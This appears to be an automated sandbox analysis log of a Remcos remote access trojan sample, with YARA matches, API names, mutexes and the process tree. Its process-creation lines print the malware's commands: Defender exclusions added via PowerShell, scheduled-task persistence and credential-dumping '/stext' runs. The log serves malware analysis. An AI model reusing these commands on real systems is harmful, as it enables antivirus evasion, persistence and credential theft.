                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.34f9970.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.34f9970.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 00000000.00000002.2081908581.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: Process Memory Space: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe PID: 5328, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: Process Memory Space: mXJeXQoaGktJCW.exe PID: 7692, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: mXJeXQoaGktJCW.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 10.2.mXJeXQoaGktJCW.exe.4f68810.1.raw.unpack, qVTa4C2qFjWp91p9EE.csSecurity API names: _0020.SetAccessControl
                    Source: 10.2.mXJeXQoaGktJCW.exe.4f68810.1.raw.unpack, qVTa4C2qFjWp91p9EE.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 10.2.mXJeXQoaGktJCW.exe.4f68810.1.raw.unpack, qVTa4C2qFjWp91p9EE.csSecurity API names: _0020.AddAccessRule
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.408d7f8.3.raw.unpack, qVTa4C2qFjWp91p9EE.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.408d7f8.3.raw.unpack, qVTa4C2qFjWp91p9EE.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.408d7f8.3.raw.unpack, qVTa4C2qFjWp91p9EE.csSecurity API names: _0020.AddAccessRule
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.408d7f8.3.raw.unpack, QhBFofCVxaxcONJT4Z.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.4147e18.0.raw.unpack, QhBFofCVxaxcONJT4Z.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 10.2.mXJeXQoaGktJCW.exe.4eae1f0.0.raw.unpack, QhBFofCVxaxcONJT4Z.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 10.2.mXJeXQoaGktJCW.exe.4f68810.1.raw.unpack, QhBFofCVxaxcONJT4Z.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.4147e18.0.raw.unpack, qVTa4C2qFjWp91p9EE.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.4147e18.0.raw.unpack, qVTa4C2qFjWp91p9EE.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.4147e18.0.raw.unpack, qVTa4C2qFjWp91p9EE.csSecurity API names: _0020.AddAccessRule
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.b4b0000.5.raw.unpack, QhBFofCVxaxcONJT4Z.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.b4b0000.5.raw.unpack, qVTa4C2qFjWp91p9EE.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.b4b0000.5.raw.unpack, qVTa4C2qFjWp91p9EE.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.b4b0000.5.raw.unpack, qVTa4C2qFjWp91p9EE.csSecurity API names: _0020.AddAccessRule
                    Source: 10.2.mXJeXQoaGktJCW.exe.4eae1f0.0.raw.unpack, qVTa4C2qFjWp91p9EE.csSecurity API names: _0020.SetAccessControl
                    Source: 10.2.mXJeXQoaGktJCW.exe.4eae1f0.0.raw.unpack, qVTa4C2qFjWp91p9EE.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 10.2.mXJeXQoaGktJCW.exe.4eae1f0.0.raw.unpack, qVTa4C2qFjWp91p9EE.csSecurity API names: _0020.AddAccessRule
                    Source: classification engineClassification label: mal100.rans.phis.troj.spyw.expl.evad.winEXE@31/19@3/2
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 17_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,17_2_004182CE
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 15_2_0041798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,15_2_0041798D
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 20_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,20_2_00410DE1
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 17_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,17_2_00418758
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 15_2_0040F4AF GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,15_2_0040F4AF
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 15_2_0041B539 FindResourceA,LoadResource,LockResource,SizeofResource,15_2_0041B539
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 15_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,15_2_0041AADB
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeFile created: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeJump to behavior
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7644:120:WilError_03
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6768:120:WilError_03
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-7XAUXH
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3720:120:WilError_03
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeMutant created: \Sessions\1\BaseNamedObjects\hkdRDDrngmy
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6544:120:WilError_03
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeFile created: C:\Users\user\AppData\Local\Temp\tmp8E60.tmpJump to behavior
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSystem information queried: HandleInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000013.00000002.2133437049.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000011.00000002.2142979032.000000000308C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeReversingLabs: Detection: 23%
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeEvasive API call chain: __getmainargs,DecisionNodes,exit
                    Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe"
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mXJeXQoaGktJCW" /XML "C:\Users\user\AppData\Local\Temp\tmp8E60.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mXJeXQoaGktJCW" /XML "C:\Users\user\AppData\Local\Temp\tmp9E3E.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeProcess created: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe "C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe"
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeProcess created: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe "C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe"
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe /stext "C:\Users\user\AppData\Local\Temp\vkwehamdpyfugcryqteiojtur"
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe /stext "C:\Users\user\AppData\Local\Temp\vkwehamdpyfugcryqteiojtur"
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe /stext "C:\Users\user\AppData\Local\Temp\xmcxhkxfdgxhrrnkzezbznfdacwy"
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe /stext "C:\Users\user\AppData\Local\Temp\xmcxhkxfdgxhrrnkzezbznfdacwy"
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe /stext "C:\Users\user\AppData\Local\Temp\ighpidhzropmtxboqpldcaaujighwuh"
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mXJeXQoaGktJCW" /XML "C:\Users\user\AppData\Local\Temp\tmp8E60.tmp"Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe /stext "C:\Users\user\AppData\Local\Temp\vkwehamdpyfugcryqteiojtur"Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe /stext "C:\Users\user\AppData\Local\Temp\vkwehamdpyfugcryqteiojtur"Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe /stext "C:\Users\user\AppData\Local\Temp\xmcxhkxfdgxhrrnkzezbznfdacwy"Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe /stext "C:\Users\user\AppData\Local\Temp\xmcxhkxfdgxhrrnkzezbznfdacwy"Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe /stext "C:\Users\user\AppData\Local\Temp\ighpidhzropmtxboqpldcaaujighwuh"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mXJeXQoaGktJCW" /XML "C:\Users\user\AppData\Local\Temp\tmp9E3E.tmp"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeProcess created: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe "C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeProcess created: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe "C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSection loaded: cryptsp.dllJump to behavior
